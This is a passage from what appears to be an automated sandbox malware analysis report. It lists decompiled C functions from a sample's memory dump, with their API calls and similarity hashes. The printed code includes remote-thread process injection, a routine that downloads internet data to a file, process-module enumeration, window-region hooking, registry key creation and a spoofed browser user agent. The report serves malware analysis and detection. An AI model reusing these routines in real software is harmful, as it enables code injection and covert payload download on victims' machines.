    					_t40 = (_t69->bmiHeader.biBitCount & 0x0000ffff) - 1;
    					_a4 = 0;
    					_t69->bmiHeader.biHeight = _t61;
    					if(_t40 == 0) {
    						L8:
    						_t69->bmiHeader.biClrUsed = 0;
    						_push(8);
    						_t69->bmiHeader.biClrImportant = 0;
    						L9:
    						_pop(_t41);
    						_t69->bmiHeader.biBitCount = _t41;
    						L10:
    						_t67 = _a8;
    						asm("cdq");
    						_t63 = _t62 & 0x00000007;
    						asm("cdq");
    						_t69->bmiHeader.biSizeImage = ((_t69->bmiHeader.biBitCount & 0x0000ffff) * _t69->bmiHeader.biWidth * _t61 + (_t62 & 0x00000007) >> 0x00000003 ^ _t63) - _t63;
    						_t69->bmiHeader.biCompression = 0;
    						if(_t67 != 0) {
    							 *_t67 = _t69;
    						}
    						_t49 = CreateDIBSection(_v8, _t69, 0, _a12, _a16, _a20);
    						_v12 = _t49;
    						if(_t49 == 0 || _t67 == 0) {
    							goto L14;
    						} else {
    							goto L17;
    						}
    					}
    					_t50 = _t40 - 3;
    					if(_t50 == 0) {
    						goto L8;
    					}
    					if(_t50 != 0x14) {
    						goto L10;
    					}
    					_push(0x20);
    					goto L9;
    				}
    			}

    APIs
    • CreateCompatibleBitmap.GDI32(?,?,?), ref: 012BA2FA
    • GetDIBits.GDI32(?,?,00000000,00000001,00000000,00000000,00000000), ref: 012BA339
    • GetDIBits.GDI32(?,?,00000000,00000001,00000000,00000000,00000000), ref: 012BA34F
    • DeleteObject.GDI32(?), ref: 012BA35C
    • CreateDIBSection.GDI32(?,00000000,00000000,?,?,?), ref: 012BA3CC
    • DeleteObject.GDI32(?), ref: 012BA3EC
    Memory Dump Source
    • Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: BitsCreateDeleteObject$BitmapCompatibleSection
    • String ID:
    • API String ID: 2572915924-0
    • Opcode ID: e3435ef6e28a1b6ae770f1ecbe4677ff88b7a21a60f49377a1b31e71dd02f816
    • Instruction ID: 7bcff9c206d9718103b85780ca751b47be61b9a4558fd3a28c4a383dcc9c557a
    • Opcode Fuzzy Hash: e3435ef6e28a1b6ae770f1ecbe4677ff88b7a21a60f49377a1b31e71dd02f816
    • Instruction Fuzzy Hash: 4631CFB251220AFFEF209F68DCC49AE7EA9FF48380B00852DF64697550D771D940DB60
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E012BBCC0(void* __ecx, WCHAR* __edx, intOrPtr _a4, void* _a8) {
    				char _v5;
    				long _v12;
    				struct _OVERLAPPED* _v16;
    				void* _v20;
    				void* _v24;
    				long _v28;
    				WCHAR* _v32;
    				void* _t28;
    				long _t37;
    				void* _t46;
    
    				_v32 = __edx;
    				_v24 = __ecx;
    				_v5 = 0;
    				_t46 = CreateFileW(__edx, 0x40000000, 1, 0, 2, 0x80, 0);
    				if(_t46 == 0xffffffff) {
    					L15:
    					return _v5;
    				}
    				_t28 = L012B1C17(0x1000);
    				_v20 = _t28;
    				if(_t28 == 0) {
    					L13:
    					CloseHandle(_t46);
    					if(_v5 == 0) {
    						L012B1640(_v32);
    					}
    					goto L15;
    				}
    				_v16 = 0;
    				while(_a8 == 0 || WaitForSingleObject(_a8, 0) == 0x102) {
    					if(InternetReadFile(_v24, _v20, 0x1000,  &_v12) == 0) {
    						break;
    					}
    					if(_v12 == 0) {
    						FlushFileBuffers(_t46);
    						_v5 = 1;
    						break;
    					}
    					if(WriteFile(_t46, _v20, _v12,  &_v28, 0) == 0) {
    						break;
    					}
    					_t37 = _v12;
    					if(_t37 != _v28) {
    						break;
    					}
    					_v16 = _v16 + _t37;
    					if(_v16 <= _a4) {
    						continue;
    					}
    					break;
    				}
    				L012B1933(_v20);
    				goto L13;
    			}

    APIs
    • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 012BBCE4
    • WaitForSingleObject.KERNEL32(?,00000000,?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 012BBD12
    • InternetReadFile.WININET(?,?,00001000,?), ref: 012BBD2E
    • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 012BBD49
    • FlushFileBuffers.KERNEL32(00000000,?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 012BBD69
    • CloseHandle.KERNEL32(00000000,?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 012BBD7C
    Memory Dump Source
    • Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: File$BuffersCloseCreateFlushHandleInternetObjectReadSingleWaitWrite
    • String ID:
    • API String ID: 3509176705-0
    • Opcode ID: a74ab7d9bbf5d602101f76d53a8b00c321f22b2568e002ec25dbecfb1fe7fa9e
    • Instruction ID: 3e764b09f30f1e0e9ab9367271c2aae4172ef9bf38eec85ac09afa3179158b47
    • Opcode Fuzzy Hash: a74ab7d9bbf5d602101f76d53a8b00c321f22b2568e002ec25dbecfb1fe7fa9e
    • Instruction Fuzzy Hash: FD219230E1020BBFDF119FA9DCC8BFE7BB9AF44390F144069E211A6195D7385945CB12
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 62%
    			E012B4D7D(intOrPtr __ecx, WCHAR* __edx) {
    				unsigned int _v8;
    				intOrPtr _v12;
    				signed int _v16;
    				unsigned int _v20;
    				WCHAR* _v24;
    				char _v28;
    				short _v548;
    				char* _t28;
    				unsigned int* _t33;
    				WCHAR* _t35;
    				void* _t41;
    				void* _t47;
    				signed int _t49;
    
    				_v24 = __edx;
    				_v12 = __ecx;
    				_t3 = PathIsRelativeW(__edx) - 1; // -1
    				_push( &_v8);
    				_push(4);
    				_t28 =  &_v28;
    				asm("sbb bl, bl");
    				_push(_t28);
    				_push(_v12);
    				_t49 = 0;
    				_t41 =  ~_t3 + 1;
    				_v16 = 0;
    				L012D24D8();
    				if(_t28 != 0) {
    					_t47 = L012B1C17(_v8);
    					if(_t47 != 0) {
    						_v20 = _v8 >> 2;
    						_t33 =  &_v8;
    						_push(_t33);
    						_push(_v8);
    						_push(_t47);
    						_push(_v12);
    						L012D24D8();
    						if(_t33 != 0 && _v20 > 0) {
    							while(1) {
    								_push(0x104);
    								_t35 =  &_v548;
    								_push(_t35);
    								_push( *((intOrPtr*)(_t47 + _t49 * 4)));
    								_push(_v12);
    								if(_t41 == 0) {
    									L012D24CC();
    								} else {
    									L012D24D2();
    								}
    								if(_t35 != 0 && lstrcmpiW( &_v548, _v24) == 0) {
    									break;
    								}
    								_t49 = _t49 + 1;
    								if(_t49 < _v20) {
    									continue;
    								} else {
    								}
    								goto L12;
    							}
    							_v16 =  *((intOrPtr*)(_t47 + _t49 * 4));
    						}
    						L12:
    						L012B1933(_t47);
    					}
    				}
    				return _v16;
    			}

    APIs
    • PathIsRelativeW.SHLWAPI ref: 012B4D8F
    • EnumProcessModules.PSAPI(?,?,00000004,?), ref: 012B4DB0
    • EnumProcessModules.PSAPI(?,00000000,?,?,?,?,?,00000004,?), ref: 012B4DE0
    • GetModuleBaseNameW.PSAPI(?,00000000,?,00000104,?,00000000,?,?,?,?,?,00000004,?), ref: 012B4E04
    • GetModuleFileNameExW.PSAPI(?,00000000,?,00000104,?,00000000,?,?,?,?,?,00000004,?), ref: 012B4E0B
    • lstrcmpiW.KERNEL32(?,?,?,00000000,?,00000104,?,00000000,?,?,?,?,?,00000004,?), ref: 012B4E1E
    Memory Dump Source
    • Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: EnumModuleModulesNameProcess$BaseFilePathRelativelstrcmpi
    • String ID:
    • API String ID: 1505091101-0
    • Opcode ID: bf223ca9cda1d975733d32d5fbb7b0e01a36fde1d90ddcb7ea133a7621e1a699
    • Instruction ID: 32c491ff5e7d67c2d72244e0a441a2dee842ef3249fb75f4d4c67d3fd2613fd2
    • Opcode Fuzzy Hash: bf223ca9cda1d975733d32d5fbb7b0e01a36fde1d90ddcb7ea133a7621e1a699
    • Instruction Fuzzy Hash: C7217C7191015AFBDF22EBA8D8C4DFEBBB9FF04384F044065A602A6101D7309A51DBA1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 66%
    			E012B95C0(WCHAR* __ecx, void** __edx, long _a4) {
    				intOrPtr _v8;
    				long _v12;
    				void* _t19;
    				void* _t20;
    				long _t22;
    				void* _t23;
    				void** _t35;
    
    				_push(__ecx);
    				_push(__ecx);
    				asm("sbb eax, eax");
    				_t35 = __edx;
    				_t19 = CreateFileW(__ecx, 0x80000000,  ~(_a4 & 2) & 0x00000006 | 0x00000001, 0, 3, 0, 0);
    				_t35[2] = _t19;
    				if(_t19 == 0xffffffff) {
    					L11:
    					_t20 = 0;
    				} else {
    					__imp__GetFileSizeEx(_t19,  &_v12);
    					if(_t19 == 0 || _v8 != 0) {
    						L10:
    						CloseHandle(_t35[2]);
    						goto L11;
    					} else {
    						_t22 = _v12;
    						_t35[1] = _t22;
    						if(_t22 != 0) {
    							_t23 = VirtualAlloc(0, _t22, 0x3000, 4);
    							 *_t35 = _t23;
    							if(_t23 == 0) {
    								goto L10;
    							} else {
    								if(ReadFile(_t35[2], _t23, _t35[1],  &_a4, 0) == 0 || _a4 != _t35[1]) {
    									VirtualFree( *_t35, 0, 0x8000);
    									goto L10;
    								} else {
    									goto L5;
    								}
    							}
    						} else {
    							 *_t35 = 0;
    							L5:
    							_t20 = 1;
    						}
    					}
    				}
    				return _t20;
    			}

    APIs
    • CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000), ref: 012B95E9
    • GetFileSizeEx.KERNEL32(00000000,?,?,80000000,?,00000000,00000003,00000000,00000000), ref: 012B95FC
    • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,80000000,?,00000000,00000003,00000000,00000000), ref: 012B9624
    • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,80000000,?,00000000,00000003,00000000,00000000), ref: 012B963C
    • VirtualFree.KERNEL32(?,00000000,00008000,?,80000000,?,00000000,00000003,00000000,00000000), ref: 012B9656
    • CloseHandle.KERNEL32(?,?,80000000,?,00000000,00000003,00000000,00000000), ref: 012B965F
    Memory Dump Source
    • Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: File$Virtual$AllocCloseCreateFreeHandleReadSize
    • String ID:
    • API String ID: 1974014688-0
    • Opcode ID: dff74524e6e07a6122f5dc439e4b07a7fc00342cde45a0c95d6bc4c1e797bd8e
    • Instruction ID: cd0379176246a204485db27721459f251a63fa216a7476c556b16dd22c85c70f
    • Opcode Fuzzy Hash: dff74524e6e07a6122f5dc439e4b07a7fc00342cde45a0c95d6bc4c1e797bd8e
    • Instruction Fuzzy Hash: 1B11BEB1520201BFEF318F29DC89EAB7FACEB85B54B10491CFB96C6194D630A580CB20
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 92%
    			E012B7F16(int __ecx, intOrPtr* __edx, struct tagPOINT _a4, signed int _a8) {
    				int _v8;
    				struct HWND__* _v12;
    				long _v16;
    				intOrPtr* _v20;
    				long _t24;
    				struct HWND__* _t32;
    				intOrPtr* _t41;
    
    				_push(_a8);
    				_t41 = __edx;
    				_v20 = __edx;
    				_v8 = __ecx;
    				_t32 = WindowFromPoint(_a4.x);
    				if(_t32 != 0) {
    					if(SendMessageTimeoutW(_t32, 0x84, 0, (_a8 & 0x0000ffff) << 0x00000010 | _a4.x & 0x0000ffff, 2, _v8,  &_v16) != 0) {
    						_t24 = _v16;
    						if(_t24 != 0xffffffff) {
    							if(_t41 != 0) {
    								 *_t41 = _t24;
    							}
    						} else {
    							_v12 = _t32;
    							SetWindowLongW(_t32, 0xfffffff0, GetWindowLongW(_t32, 0xfffffff0) | 0x08000000);
    							_t32 = L012B1889(_v8, _v20, _a4, _a8);
    							SetWindowLongW(_v12, 0xfffffff0, GetWindowLongW(_v12, 0xfffffff0) & 0xf7ffffff);
    						}
    					} else {
    						_t32 = 0;
    					}
    				}
    				return _t32;
    			}

    APIs
    • WindowFromPoint.USER32(?,?), ref: 012B7F2C
    • SendMessageTimeoutW.USER32 ref: 012B7F5B
    • GetWindowLongW.USER32(00000000,000000F0), ref: 012B7F7E
    • SetWindowLongW.USER32 ref: 012B7F8F
    • GetWindowLongW.USER32(?,000000F0), ref: 012B7FA9
    • SetWindowLongW.USER32 ref: 012B7FB6
    Memory Dump Source
    • Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: Window$Long$FromMessagePointSendTimeout
    • String ID:
    • API String ID: 2645164282-0
    • Opcode ID: b91d5f36271ab47d8f50afea684ff81361e525fa4d9a6725a970ad18d00bb245
    • Instruction ID: e2f340574a9ac095aa3d2727582653f254d8e5f8e39e0e70fadfa7cdeec0d47c
    • Opcode Fuzzy Hash: b91d5f36271ab47d8f50afea684ff81361e525fa4d9a6725a970ad18d00bb245
    • Instruction Fuzzy Hash: 3811B471910219BBEF105FA8DC84EAD7B79EB44370F204725FA61A32D4D770D910CB94
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 92%
    			E012C2ED8(void* __ecx, long _a4, intOrPtr _a8, intOrPtr _a12) {
    				char _v5;
    				void* _t11;
    				void* _t15;
    				void* _t26;
    				void* _t29;
    
    				_push(__ecx);
    				_v5 = 0;
    				_t29 = OpenProcess(0x47a, 0, _a4);
    				_t31 = _t29;
    				if(_t29 != 0) {
    					_t11 = L012B1A05(_t29, _a8, _t31, _a12);
    					_t26 = _t11;
    					if(_t26 != 0) {
    						_t15 = CreateRemoteThread(_t29, 0, 0, _t11 -  *0x12dc74c + E012B17DF, 0, 0, 0);
    						_a4 = _t15;
    						if(_t15 == 0) {
    							VirtualFreeEx(_t29, _t26, 0, 0x8000);
    						} else {
    							WaitForSingleObject(_t15, 0x2710);
    							CloseHandle(_a4);
    							_v5 = 1;
    						}
    					}
    					CloseHandle(_t29);
    				}
    				return _v5;
    			}

    APIs
    • OpenProcess.KERNEL32(0000047A,00000000,?), ref: 012C2EEC
    • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,-0258DF2B,00000000,00000000,00000000), ref: 012C2F1E
    • WaitForSingleObject.KERNEL32(00000000,00002710), ref: 012C2F31
    • CloseHandle.KERNEL32(?), ref: 012C2F3A
    • VirtualFreeEx.KERNEL32(00000000,00000000,00000000,00008000), ref: 012C2F4E
    • CloseHandle.KERNEL32(00000000,?), ref: 012C2F55
    Memory Dump Source
    • Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: CloseHandle$CreateFreeObjectOpenProcessRemoteSingleThreadVirtualWait
    • String ID:
    • API String ID: 14861764-0
    • Opcode ID: bff87e2e0a40af36539c11fe6aeef91cc86801a416c1b259d70726f9e4e1def5
    • Instruction ID: 8d9a4b824321777e319f287c8e69a46ec8c51e662b4b61ace20472679a1aa853
    • Opcode Fuzzy Hash: bff87e2e0a40af36539c11fe6aeef91cc86801a416c1b259d70726f9e4e1def5
    • Instruction Fuzzy Hash: EB01B5B2505299BFEB211FA8ECCCDAF3F6CEB49694B054028FB069A144CF754D1A8771
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 92%
    			E012CE43A(struct HWND__* _a4, struct HRGN__* _a8, int _a12) {
    				void* _t21;
    				int _t22;
    				signed int _t23;
    				struct HWND__* _t27;
    				char* _t31;
    
    				_t27 = _a4;
    				if(( *0x12dc738 & 0x00000004) == 0 || L012B150A() == 0) {
    					L7:
    					return GetUpdateRgn(_t27, _a8, _a12);
    				} else {
    					_t31 = TlsGetValue( *0x12dd83c);
    					if(_t31 == 0 || _t27 !=  *((intOrPtr*)(_t31 + 4))) {
    						goto L7;
    					} else {
    						SetRectRgn(_a8,  *(_t31 + 0xc),  *(_t31 + 0x10),  *(_t31 + 0x14),  *(_t31 + 0x18));
    						if(_a12 != 0) {
    							_t22 = SaveDC( *(_t31 + 8));
    							_t23 = SendMessageW(_t27, 0x14,  *(_t31 + 8), 0);
    							asm("sbb eax, eax");
    							 *((intOrPtr*)(_t31 + 0x1c)) =  ~_t23 + 1;
    							RestoreDC( *(_t31 + 8), _t22);
    						}
    						 *_t31 = 1;
    						_t21 = 2;
    						return _t21;
    					}
    				}
    			}

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: MessageRectRestoreSaveSendUpdateValue
    • String ID:
    • API String ID: 1426479601-0
    • Opcode ID: f40d702fc8b80c03f2e14e6b63ce9b32d1f015a6239acf283744abfbc9f073dd
    • Instruction ID: 1decc5c0f85a246f8ab582f2a3dcf7ce95d53ab8898e8b5910717a17057cd55f
    • Opcode Fuzzy Hash: f40d702fc8b80c03f2e14e6b63ce9b32d1f015a6239acf283744abfbc9f073dd
    • Instruction Fuzzy Hash: 60119A31401B05EFDB325F64FC4CE9ABFA5FB08B11F018A08FB96860A4C332A050DB60
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E012CE4CE(void* __esi) {
    				char _v20;
    				char* _v80;
    				char _v88;
    				char _v188;
    				char _v708;
    				void* _t15;
    				void* _t28;
    				void* _t41;
    				void** _t44;
    				void* _t46;
    
    				_t46 = __esi;
    				_t15 =  *(__esi + 0x180);
    				if(_t15 == 0 || WaitForSingleObject(_t15, 0) != 0x102) {
    					_t44 = _t46 + 0x17c;
    					L012B11D1(_t44);
    					L012B15E6(1,  &_v708);
    					L012B137F(0x2937498d,  &_v188, 0);
    					_t41 = 0x44;
    					L012B19F6( &_v88, _t41);
    					_v88 = 0x44;
    					_v80 =  &_v188;
    					ResetEvent( *(_t46 + 0xc));
    					if(L012B166D( &_v708, 0x12d9f8c, 0,  &_v88,  &_v20) != 0) {
    						L012B1947(_t44,  &_v20, 0x10);
    						if(WaitForSingleObject( *(_t46 + 0xc), 0x3e8) == 0) {
    							goto L6;
    						} else {
    							TerminateProcess( *_t44, 0);
    							L012B11D1(_t44);
    							goto L3;
    						}
    					} else {
    						L3:
    						_t28 = 0;
    					}
    				} else {
    					L6:
    					_t28 = 1;
    				}
    				return _t28;
    			}

    APIs
    • WaitForSingleObject.KERNEL32(?,00000000), ref: 012CE4E5
    • ResetEvent.KERNEL32(?,00000000), ref: 012CE541
    • WaitForSingleObject.KERNEL32(?,000003E8,?,?,00000010,00000000,00000044,?), ref: 012CE57D
    • TerminateProcess.KERNEL32(?,00000000), ref: 012CE58B
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: ObjectSingleWait$EventProcessResetTerminate
    • String ID: D
    • API String ID: 882540868-2746444292
    • Opcode ID: dd5ebb5095eeb4fe140bd1b8e31410605b53394aa18712389297f485c45b7f9c
    • Instruction ID: e66b6c48fe271063a17024d44d9e6372ec75ec1ed054303dc1261669cd6755d2
    • Opcode Fuzzy Hash: dd5ebb5095eeb4fe140bd1b8e31410605b53394aa18712389297f485c45b7f9c
    • Instruction Fuzzy Hash: DE11DA31A103069BEB31EB64EC85FFE7B7DAF64740F004519D606A6184EF74A915CB11
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E012B7E3D(intOrPtr __ecx, void* __edx, int _a4, short* _a8, intOrPtr _a12, intOrPtr _a16) {
    				char _v5;
    				void* _v12;
    				intOrPtr _v16;
    				void* _v20;
    				int _v24;
    
    				_v16 = __ecx;
    				_v5 = 0;
    				if(RegCreateKeyExW(__edx, _a4, 0, 0, 0, 4, 0,  &_v12, 0) == 0) {
    					_a4 = 0;
    					do {
    						L012B1028(_v16, _a8, _a12, _a16);
    						if(RegCreateKeyExW(_v12, _a8, 0, 0, 0, 3, 0,  &_v20,  &_v24) != 0) {
    							goto L4;
    						} else {
    							RegCloseKey(_v20);
    							if(_v24 == 1) {
    								_v5 = 1;
    							} else {
    								goto L4;
    							}
    						}
    						L7:
    						RegCloseKey(_v12);
    						goto L8;
    						L4:
    						_a4 =  &(_a4[0]);
    					} while (_a4 < 0x64);
    					goto L7;
    				}
    				L8:
    				return _v5;
    			}









    APIs
    • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 012B7E62
    • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,00000003,00000000,?,?,?,?,?,?,?,00000000,00000000), ref: 012B7E97
    • RegCloseKey.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 012B7EA0
    • RegCloseKey.ADVAPI32(00000064,?,?,?,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 012B7EBA
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: CloseCreate
    • String ID: d
    • API String ID: 2932200918-2564639436
    • Opcode ID: c08a123b4c86ec7fcc1aeeea88a7c51a8a0f1f9abac1d1720c21f02f0ded9823
    • Instruction ID: de46e0c353a241ad88cf536f130e14abcf9c56f5f9bcf8375eac4faad0b4cb94
    • Opcode Fuzzy Hash: c08a123b4c86ec7fcc1aeeea88a7c51a8a0f1f9abac1d1720c21f02f0ded9823
    • Instruction Fuzzy Hash: 50110AB591020DBEEB029F94DC80DEFBFBDEF54288F004066FA1166251D2719E159BB1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 93%
    			E012B5093(char* __ecx, char* __edx, short _a4, signed int _a8) {
    				char* _v8;
    				void* _t11;
    				void* _t16;
    				char* _t18;
    				void* _t24;
    
    				_t18 = __ecx;
    				_push(__ecx);
    				_v8 = __edx;
    				if(__ecx == 0) {
    					_t18 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)";
    				}
    				_t16 = InternetOpenA(_t18,  !_a8 & 0x00000001, 0, 0, 0);
    				if(_t16 == 0) {
    					L7:
    					_t11 = 0;
    				} else {
    					_t24 = 0;
    					do {
    						_t3 = _t24 + 0x12db00c; // 0x12db00c
    						_t4 = _t24 + 0x12db008; // 0x2
    						InternetSetOptionA(_t16,  *_t4, _t3, 4);
    						_t24 = _t24 + 8;
    					} while (_t24 < 0x18);
